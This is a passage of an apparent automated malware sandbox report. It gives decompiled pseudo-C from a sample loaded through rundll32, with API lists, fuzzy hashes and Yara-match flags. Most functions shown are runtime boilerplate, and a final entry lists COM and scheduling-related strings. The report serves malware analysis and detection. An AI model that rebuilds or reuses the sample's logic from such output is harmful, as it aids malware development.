                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: f5f476bd7e3daf250e3b35d32f77d0721671b514eaff16d4f955099b3bcacd9e
                • Instruction ID: cea36da8b33cbcf1c87d44d3f7d87b87c2e7ac6f636685ded835bec845f37d4d
                • Opcode Fuzzy Hash: f5f476bd7e3daf250e3b35d32f77d0721671b514eaff16d4f955099b3bcacd9e
                • Instruction Fuzzy Hash: 61016977218AD083C7558BA6E44429EB775F789BE0F104212EFAD07B98CF78D651CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00000215215205F4F78(void* __ecx) {
                				void* __rbx;
                				void* _t12;
                				void* _t17;
                				void* _t18;
                				void* _t19;
                				void* _t20;
                
                				_t2 =  ==  ? 1 :  *0x20681dd8 & 0x000000ff;
                				 *0x20681dd8 =  ==  ? 1 :  *0x20681dd8 & 0x000000ff;
                				E00000215215205F5BFC(1, _t12, _t17, _t18, _t19, _t20);
                				if (E00000215215205F9AF8() != 0) goto 0x205f4fa7;
                				goto 0x205f4fbb; // executed
                				E000002152152060BC90(_t17); // executed
                				if (0 != 0) goto 0x205f4fb9;
                				E00000215215205F9B54(0);
                				goto 0x205f4fa3;
                				return 1;
                			}










                APIs
                • __vcrt_initialize.LIBVCRUNTIME ref: 00000215205F4F9A
                  • Part of subcall function 00000215205F9AF8: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00000215205F9AFC
                  • Part of subcall function 00000215205F9AF8: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00000215205F9B01
                  • Part of subcall function 00000215205F9AF8: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00000215205F9B06
                • __vcrt_uninitialize.LIBVCRUNTIME ref: 00000215205F4FB2
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: __vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                • String ID:
                • API String ID: 3381670000-0
                • Opcode ID: 0406b4c93419378f1691c4e5f4c2e4d142f802894aa7c883ff8141f946f1c700
                • Instruction ID: d8c7cadf3eaf715eb93ffdeea912cdd111c365fc62d798de0497262b929e5fa5
                • Opcode Fuzzy Hash: 0406b4c93419378f1691c4e5f4c2e4d142f802894aa7c883ff8141f946f1c700
                • Instruction Fuzzy Hash: C9E04F7270BD70C2FF692771208E3E912902FFB300F6450D8AC9A462CF842D849E2A20
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 19%
                			E000002152152060B70C(signed int __esi, long long __rbx, void* __rdx, long long __rsi, signed long long*** __r8, long long __r9, long long _a8, long long _a16, long long _a32) {
                				signed long long _v48;
                				signed long long _v56;
                				signed long long _v64;
                				signed long long _v72;
                				signed long long _t50;
                				intOrPtr* _t54;
                				signed long long _t57;
                				signed long long _t61;
                				signed long long _t62;
                				signed long long _t63;
                				signed long long _t72;
                				signed long long _t73;
                				signed int* _t74;
                				signed long long _t77;
                				signed long long _t81;
                				signed long long _t82;
                				signed long long _t84;
                				signed long long _t92;
                				signed long long*** _t97;
                
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_a32 = __r9;
                				_t97 = __r8;
                				E0000021521520603CEC();
                				_t72 =  *((intOrPtr*)( *((intOrPtr*)(__r8))));
                				if (_t72 != 0) goto 0x2060b74a;
                				goto 0x2060b88a;
                				_t81 =  *0x2067c720; // 0xca1645d940e
                				r8d = __esi;
                				r8d = r8d & 0x0000003f;
                				_t77 = _t81 ^  *_t72;
                				asm("dec eax");
                				_v56 = _t77;
                				_t61 = _t81 ^  *(_t72 + 8);
                				asm("dec eax");
                				_v72 = _t61;
                				_t7 = _t77 - 1; // 0xca1645d940d
                				_t50 = _t7;
                				if (_t50 - 0xfffffffd > 0) goto 0x2060b880;
                				_v64 = _t77;
                				_v48 = _t61;
                				r13d = 0x40;
                				asm("dec eax");
                				_t62 = _t61 - 8;
                				_v72 = _t62;
                				if (_t62 - _t77 < 0) goto 0x2060b7c4;
                				if ( *_t62 != (_t50 ^ _t81)) goto 0x2060b7bf;
                				goto 0x2060b7aa;
                				if (_t62 - _t77 >= 0) goto 0x2060b80e;
                				_t63 = _t62 | 0xffffffff;
                				if (_t77 == _t63) goto 0x2060b7dc;
                				E000002152152060A780(_t50 ^ _t81, _t77);
                				_t82 =  *0x2067c720; // 0xca1645d940e
                				r13d = r13d - (__esi & 0x0000003f);
                				asm("dec eax");
                				_t73 = _t72 ^ _t82;
                				 *( *( *_t97)) = _t73;
                				( *( *_t97))[1] = _t73;
                				_t54 =  *_t97;
                				 *( *_t54 + 0x10) = _t73;
                				goto 0x2060b880;
                				asm("dec eax");
                				 *_t63 = _t54;
                				 *0x20627698(); // executed
                				TlsFree(??); // executed
                				_t74 =  *( *_t97);
                				_t84 =  *0x2067c720; // 0xca1645d940e
                				r8d = __esi;
                				r8d = r8d & 0x0000003f;
                				_t92 = _t84 ^  *_t74;
                				asm("dec ecx");
                				_t57 = _t74[2] ^ _t84;
                				asm("dec eax");
                				if (_t92 != _t77) goto 0x2060b85b;
                				if (_t57 == _t61) goto 0x2060b87b;
                				_v64 = _t92;
                				_v56 = _t92;
                				_v48 = _t57;
                				_v72 = _t57;
                				goto 0x2060b79c;
                				E0000021521520603D40();
                				return 0;
                			}























                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 69ab4f87d4ed671cd3057637d2d326f493590c95839ed9e94bbdcf417b247d1c
                • Instruction ID: 41b11263adec4e5452355fa670ff2e739c7bbfac6f959041df80f811bc1c6f0d
                • Opcode Fuzzy Hash: 69ab4f87d4ed671cd3057637d2d326f493590c95839ed9e94bbdcf417b247d1c
                • Instruction Fuzzy Hash: DD418133312F64C1EA24CB15E45429AB3A6F7E8FE4F149215DEA907BE8EF38D4518740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E000002152152060ADA0(void* __ecx, void* __edx, void* __edi, long long __rbx, long long __rdi, long long __rsi, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
                				void* _t28;
                				void* _t46;
                				signed long long _t61;
                				long long _t63;
                				intOrPtr* _t66;
                				signed long long _t67;
                				signed long long _t76;
                				signed long long _t81;
                				void* _t84;
                				void* _t85;
                				WCHAR* _t88;
                
                				_t79 = __rsi;
                				_t63 = __rbx;
                				_t61 = _t81;
                				 *((long long*)(_t61 + 8)) = __rbx;
                				 *((long long*)(_t61 + 0x10)) = __rsi;
                				 *((long long*)(_t61 + 0x18)) = __rdi;
                				 *((long long*)(_t61 + 0x20)) = __r14;
                				_t46 = r8d;
                				r14d = __ecx;
                				if (r8d != 0) goto 0x2060ae10;
                				GetModuleHandleW(_t88);
                				if (_t61 == 0) goto 0x2060ae10;
                				if ( *_t61 != 0x5a4d) goto 0x2060ae10;
                				_t66 =  *((intOrPtr*)(_t61 + 0x3c)) + _t61;
                				if ( *_t66 != 0x4550) goto 0x2060ae10;
                				if ( *((intOrPtr*)(_t66 + 0x18)) != 0x20b) goto 0x2060ae10;
                				if ( *((intOrPtr*)(_t66 + 0x84)) - 0xe <= 0) goto 0x2060ae10;
                				if ( *((intOrPtr*)(_t66 + 0xf8)) == _t46) goto 0x2060ae10;
                				E000002152152060AF58(0x20b, r14d, _t61, __rbx);
                				E0000021521520603CEC();
                				if ( *0x20682800 != 0) goto 0x2060aeda;
                				r15d = 1;
                				 *0x206827f0 = r15d;
                				if (__edx != 0) goto 0x2060ae83;
                				_t76 =  *0x2067c720; // 0xca1645d940e
                				asm("dec eax");
                				_t62 = _t61 ^ _t76;
                				_t67 =  *0x206827f8; // 0xca1645d940e
                				if (_t67 == (_t61 ^ _t76)) goto 0x2060ae7a;
                				asm("dec eax");
                				 *0x20627698();
                				r8d = 0;
                				 *(_t76 ^ _t67)();
                				goto 0x2060ae8f;
                				if (__edx != r15d) goto 0x2060ae95;
                				E000002152152060BA98(0x20682950); // executed
                				if (__edx != 0) goto 0x2060aeac;
                				E000002152152060BCEC(_t63, 0x20627880, 0x206278a0, _t76 ^ _t67, __rsi);
                				E000002152152060BCEC(_t63, 0x206278a8, 0x206278b0, _t76 ^ _t67, _t79);
                				_t27 =  ==  ? r15d :  *0x20682800 & 0x000000ff;
                				 *0x20682800 =  ==  ? r15d :  *0x20682800 & 0x000000ff;
                				_t28 = E00000215215205FB034(_t62, _t63, 0x206278b0, _t84, _t85);
                				E0000021521520603D40();
                				if (_t46 != 0) goto 0x2060aef1;
                				E000002152152060AF0C();
                				asm("int3");
                				return _t28;
                			}















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: HandleModule$AddressFreeLibraryProc
                • String ID:
                • API String ID: 3947729631-0
                • Opcode ID: 849623d9c797c720e54815ebb49edc999433eb98e2be7115e3a12f13f8e5b1a2
                • Instruction ID: 025186e8fc4e1ae052990e71c4d78b9e630aa8168f8e35c1e01668ab3a699e95
                • Opcode Fuzzy Hash: 849623d9c797c720e54815ebb49edc999433eb98e2be7115e3a12f13f8e5b1a2
                • Instruction Fuzzy Hash: F8419D33243E31C6FB349B15D4583EA23A2FFF0B80F2454A9DE0947699DB3AE8859340
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 63%
                			E00007FFA7FFA535EFE8C(void* __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __rdi, long long __rsi, void* __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                				long long _v24;
                				long long _t35;
                				long long _t36;
                				long long _t37;
                
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_a24 = __rdi;
                				if (0 != 0) goto 0x535efec9;
                				E00007FFA7FFA535E8380(0);
                				goto 0x535eff2d;
                				 *0x9BE8188948FB8B51();
                				_v24 = 0x9;
                				_t35 =  *0x53755250; // 0x40
                				if (__rcx - _t35 < 0) goto 0x535eff21;
                				if ( *((intOrPtr*)(0x53754e50 + __rdi * 8)) == 0x9) goto 0x535efef5;
                				goto 0x535eff17; // executed
                				E00007FFA7FFA535EFDA4( *((intOrPtr*)(0x53754e50 + __rdi * 8)) - 0x9, _t35, 0x9, 0x7, __rdx, __rcx, __rbp, __r9); // executed
                				 *((long long*)(0x53754e50 + __rdi * 8)) = _t35;
                				if (_t35 != 0) goto 0x535eff08;
                				goto 0x535eff21;
                				_t36 =  *0x53755250; // 0x40
                				_t37 = _t36 + 0x40;
                				 *0x53755250 = _t37;
                				_v24 = __rdi + 1;
                				goto 0x535efee2;
                				asm("invalid");
                				return _t37;
                			}








                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: f182c36d18bb0558c4e136d7a85a6dd1f9f42aaf76e98a9eed0fe9a62827462d
                • Instruction ID: bf7679defbbe6ecab329ff359acfa1e7b28f8dd3f48751efd3df88309eeae16a
                • Opcode Fuzzy Hash: f182c36d18bb0558c4e136d7a85a6dd1f9f42aaf76e98a9eed0fe9a62827462d
                • Instruction Fuzzy Hash: ED114C22D2DF828AF6109F50A44057963AAFFC2780F5EA075F69D67796DF2CF800A750
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00000215215206169C8(void* __ecx, void* __edx, long long __rax, signed int __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                				long long _v24;
                				void* _t18;
                				intOrPtr _t21;
                				intOrPtr _t23;
                				intOrPtr _t24;
                				void* _t32;
                				long long _t39;
                				signed long long _t45;
                
                				_t39 = __rax;
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_a24 = __rdi;
                				_t32 = __ecx;
                				if ((0 | __ecx - 0x00002000 > 0x00000000) != 0) goto 0x20616a05;
                				_t18 = E0000021521520603944(__rax);
                				 *((intOrPtr*)(__rax)) = 9;
                				E00000215215205FAABC(_t18);
                				goto 0x20616a69;
                				E0000021521520603CEC();
                				_t45 = __rbx;
                				_v24 = __rbx;
                				_t21 =  *0x20682f40; // 0x40
                				if (_t32 - _t21 < 0) goto 0x20616a5d;
                				if ( *((intOrPtr*)(0x20682b40 + __rbx * 8)) == __rbx) goto 0x20616a31;
                				goto 0x20616a53; // executed
                				E00000215215206168E0( *((intOrPtr*)(0x20682b40 + __rbx * 8)) - __rbx, __rax, __rbx, __rcx, __rdx, __rsi, __rbp, __r9); // executed
                				 *((long long*)(0x20682b40 + _t45 * 8)) = _t39;
                				if (_t39 != 0) goto 0x20616a44;
                				goto 0x20616a5d;
                				_t23 =  *0x20682f40; // 0x40
                				_t24 = _t23 + 0x40;
                				 *0x20682f40 = _t24;
                				_v24 = _t45 + 1;
                				goto 0x20616a1e;
                				E0000021521520603D40();
                				goto 0x20616a01;
                				return _t24;
                			}












                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 12cb753592418e0a759f6f428db5439732c11c79c7618c1f1c891ebc0f29000e
                • Instruction ID: f9f634e1b3cb9c88e4b30256e1bc7aaffa9ca163d74f52b4a5e0cd9fdf72be37
                • Opcode Fuzzy Hash: 12cb753592418e0a759f6f428db5439732c11c79c7618c1f1c891ebc0f29000e
                • Instruction Fuzzy Hash: B711823720AEA1C6FB349F50A4487D9A2A5FFE0380F6840A9FE955779DDB38E810C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00000215215205D0950(long long __rbx, long long __rcx, long long __rdx, intOrPtr* __r8, intOrPtr* __r9, long long _a16, void* _a24) {
                				long long _v32;
                				void* __rdi;
                				void* __rsi;
                				void* _t13;
                				void* _t14;
                				void* _t16;
                				void* _t17;
                				void* _t19;
                				long long _t23;
                				long long _t25;
                				long long _t31;
                				intOrPtr* _t34;
                				void* _t36;
                
                				_t25 = __rcx;
                				_t19 = _t36;
                				 *((long long*)(_t19 + 0x10)) = __rdx;
                				 *((long long*)(_t19 + 8)) = __rcx;
                				 *((long long*)(_t19 - 0x28)) = 0xfffffffe;
                				 *((long long*)(_t19 + 0x18)) = __rbx;
                				_t34 = __r9;
                				_t23 = __rcx;
                				 *((intOrPtr*)(__rcx + 8)) = 1;
                				 *((intOrPtr*)(__rcx + 0xc)) = 1;
                				 *((long long*)(__rcx)) = 0x20627b48;
                				_t7 = _t25 + 0x10; // 0x10
                				_t31 = _t7;
                				r8d = 0xa0;
                				E00000215215205F8EF0(_t14, 0, _t16, _t17, _t31, __rdx, _t31, __r8);
                				_a16 = _t31;
                				_v32 = _t31;
                				if (_t31 == 0) goto 0x205d09bf;
                				r8b =  *_t34;
                				_t13 = E00000215215205D0AF8(_t23, _t31,  *__r8, _t31, _t34, __r8); // executed
                				return _t13;
                			}

                APIs
                • __ExceptionPtr::__ExceptionPtr.LIBCPMT ref: 00000215205D09B9
                  • Part of subcall function 00000215205D0AF8: EncodePointer.KERNEL32 ref: 00000215205D0BE7
                  • Part of subcall function 00000215205D0AF8: __ExceptionPtr::_CallCopyCtor.LIBCPMT ref: 00000215205D0C31
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception$CallCopyCtorEncodePointerPtr::_Ptr::__
                • String ID:
                • API String ID: 1376364169-0
                • Opcode ID: 46d2c3a1ecbbe3245fce4663c78dad321fa76ba8b756435cf62105fadf4d1971
                • Instruction ID: 91cf5da75928a7ee87b86f7f983d5330b3186417c4359c28dadfdedd7c2e5131
                • Opcode Fuzzy Hash: 46d2c3a1ecbbe3245fce4663c78dad321fa76ba8b756435cf62105fadf4d1971
                • Instruction Fuzzy Hash: 4701D633301B9081D711DF1AE54469DBBA1EB99FF0F298225DEA8477E5DA39C453C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00007FFA7FFA535E7FB0(void* __eax, signed int __rcx, signed int __rdx) {
                				void* __rbx;
                				void* _t8;
                
                				if (__rcx == 0) goto 0x535e7fcf;
                				if (0xffffffffffffffe0 - __rdx < 0) goto 0x535e8012;
                				_t21 =  ==  ? 0x1 : __rcx * __rdx;
                				goto 0x535e7ff6;
                				E00007FFA7FFA535EF900();
                				if (0x1 == 0) goto 0x535e8012;
                				E00007FFA7FFA535EF4E8(0x1,  ==  ? 0x1 : __rcx * __rdx, _t21);
                				if (0x1 == 0) goto 0x535e8012;
                				 *0x1 =  *0x1 + 0x1; // executed
                				if (0x1 == 0) goto 0x535e7fe1;
                				goto 0x535e801f;
                				_t8 = E00007FFA7FFA535E8380(0x1);
                				 *0x1 = 0xc;
                				return _t8;
                			}

                APIs
                • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFA535E8B04,?,?,00003C63485C5C92,00007FFA535E8389,?,?,?,?,00007FFA535E7E7D,?,?,?), ref: 00007FFA535E8005
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 95bd6b468405d17fa2efb7e683ed559ac8666e7fb7fc56f28944b4f6525edaca
                • Instruction ID: a9e670807884ebb764c2cba4b8859986aa21cdf9515bc769ee08227e5fc957a5
                • Opcode Fuzzy Hash: 95bd6b468405d17fa2efb7e683ed559ac8666e7fb7fc56f28944b4f6525edaca
                • Instruction Fuzzy Hash: 1AF06D41B2AB0689FE59976258103B9529B5FCAB60F0CF4B0C91EA62D1DE2CE480B220
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00007FFA7FFA535E7E98(void* __rax, void* __rcx) {
                				void* __rbx;
                				void* _t4;
                
                				if (__rcx - 0xffffffe0 > 0) goto 0x535e7ee3;
                				goto 0x535e7eca;
                				E00007FFA7FFA535EF900();
                				if (0x1 == 0) goto 0x535e7ee3;
                				E00007FFA7FFA535EF4E8(0x1, __rcx, __rcx);
                				if (0x1 == 0) goto 0x535e7ee3;
                				RtlAllocateHeap(??, ??, ??); // executed
                				if (0x1 == 0) goto 0x535e7eb5;
                				goto 0x535e7ef0;
                				_t4 = E00007FFA7FFA535E8380(0x1);
                				 *0x1 = 0xc;
                				return _t4;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 480c0af5c5187464a18a8393c16ff6192f5d8bbdf6fdb0e3d4f81ab0fce67787
                • Instruction ID: 4ede43ae513be3baac5debab2facc92d28265a310ba8b1bee03fc949d1967733
                • Opcode Fuzzy Hash: 480c0af5c5187464a18a8393c16ff6192f5d8bbdf6fdb0e3d4f81ab0fce67787
                • Instruction Fuzzy Hash: 94F01211F3DB4649FE6497715901279519B9FC6760F0CEAB4DD2EE52C1DE6CA840A120
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 16%
                			E0000021521520585910(void* __rax) {
                				void* _v424;
                				void* _t9;
                
                				E00000215215205F51CC(_t9, __rax);
                				asm("lock xadd [0xfdbb0], eax");
                				if (1 != 1) goto 0x2058594b;
                				__imp__#115(); // executed
                				 *0x206834e4 = 2;
                				return  *0x206834e4;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Startup_onexit
                • String ID:
                • API String ID: 3012808385-0
                • Opcode ID: 02b5b6bada1194484d64ed02d6068ab445445d8aea1f25d6f1ba0bb3032c4826
                • Instruction ID: 491b940f68149e2d30725d8e711c20ff20439202a1d9a9092c7161981e0c9d5c
                • Opcode Fuzzy Hash: 02b5b6bada1194484d64ed02d6068ab445445d8aea1f25d6f1ba0bb3032c4826
                • Instruction Fuzzy Hash: 22E04F32542971CAE771EB14D8887D82365BBE4328F900061C51581198DA3DD50ACA00
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: lstrcmp
                • String ID:
                • API String ID: 1534048567-0
                • Opcode ID: 4f7be571659891ed88d014e727661c5c47c76810975cf07defc41387156c96f6
                • Instruction ID: 8e4895561d94445850441ec87fe0f5a2b0901914b110194f9fd381edfa507104
                • Opcode Fuzzy Hash: 4f7be571659891ed88d014e727661c5c47c76810975cf07defc41387156c96f6
                • Instruction Fuzzy Hash: C841B133307D70C7EE288F05E4987A97372FBA0B59F0445A19F4A43649E7B9D8918B40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E0000021521520607C38(void* __eax, signed int __rcx, signed int __rdx) {
                				void* __rbx;
                				intOrPtr* _t22;
                				signed int _t29;
                
                				_t29 = __rdx;
                				if (__rcx == 0) goto 0x20607c57;
                				_t1 = _t29 - 0x20; // -32
                				_t22 = _t1;
                				if (_t22 - __rdx < 0) goto 0x20607c9a;
                				_t25 =  ==  ? _t22 : __rcx * __rdx;
                				goto 0x20607c7e;
                				if (E0000021521520612620() == 0) goto 0x20607c9a;
                				if (E000002152152060AB7C(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x20607c9a;
                				HeapAlloc(??, ??, ??); // executed
                				if (_t22 == 0) goto 0x20607c69;
                				goto 0x20607ca7;
                				E0000021521520603944(_t22);
                				 *_t22 = 0xc;
                				return 0;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AllocHeap
                • String ID:
                • API String ID: 4292702814-0
                • Opcode ID: cc00c99792c01c48a74819868d5af1b3ab31548aa1daff8c19e093dd554bb964
                • Instruction ID: 7e0b4ad341f30d8d659e6ef839148b97070017b8254770678f063560c677f02b
                • Opcode Fuzzy Hash: cc00c99792c01c48a74819868d5af1b3ab31548aa1daff8c19e093dd554bb964
                • Instruction Fuzzy Hash: 5CF06272783A25C9FE745662545C3EA53927FF4B80F3C84A48D09863C9ED3CE5818110
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E0000021521520603D7C(intOrPtr* __rax, void* __rcx) {
                				void* __rbx;
                
                				if (__rcx - 0xffffffe0 > 0) goto 0x20603dc7;
                				_t16 =  ==  ? __rax : __rcx;
                				goto 0x20603dae;
                				if (E0000021521520612620() == 0) goto 0x20603dc7;
                				if (E000002152152060AB7C(__rax,  ==  ? __rax : __rcx,  ==  ? __rax : __rcx) == 0) goto 0x20603dc7;
                				HeapAlloc(??, ??, ??); // executed
                				if (__rax == 0) goto 0x20603d99;
                				goto 0x20603dd4;
                				E0000021521520603944(__rax);
                				 *__rax = 0xc;
                				return 0;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AllocHeap
                • String ID:
                • API String ID: 4292702814-0
                • Opcode ID: 956ebdcfed529ac6ad59708b428ade9f6119d3b0c5f61404e33dc8569c27877b
                • Instruction ID: 2a4a7014dd376b8be2d8adce86127680f0155fdf258cfcb600ff0aca4ea9d367
                • Opcode Fuzzy Hash: 956ebdcfed529ac6ad59708b428ade9f6119d3b0c5f61404e33dc8569c27877b
                • Instruction Fuzzy Hash: CCF0E2333ABA72C9FE741672488C3E651866FE47A1F3C0BA05C26452C9DE38A4408510
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Variant$AddressClearInitProcString_com_issue_error$AllocFree$HandleLibraryLoadModule
                • String ID: %04d-%02d-%02dT%02d:%02d:%02d$CoCreateInstance$CoInitializeEx$CoInitializeSecurity$CoUninitialize$Ole32.dll$PT%dM
                • API String ID: 2795092902-3623500657
                • Opcode ID: 3865d6dc0924d9aa26a070cdd8bf88c238a6e570e95cbdf661ebfdf4c434dd41
                • Instruction ID: fd207dbea7ef154283d184571d4e4eb89cf3e9c9ff871448866cc6e322cb5182
                • Opcode Fuzzy Hash: 3865d6dc0924d9aa26a070cdd8bf88c238a6e570e95cbdf661ebfdf4c434dd41
                • Instruction Fuzzy Hash: ECC22633302FA0CAEB659F65D8583DC33A4EBA5B98F148465DE4A5BB99DF38C584C340
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 17%
                			E00000215215205CB510(void* __eax, void* __esi, long long __rbx, char* __rcx, long long __rdx) {
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				long long* _t255;
                				long long* _t261;
                				long long* _t262;
                				long long* _t269;
                				long long* _t270;
                				long long _t279;
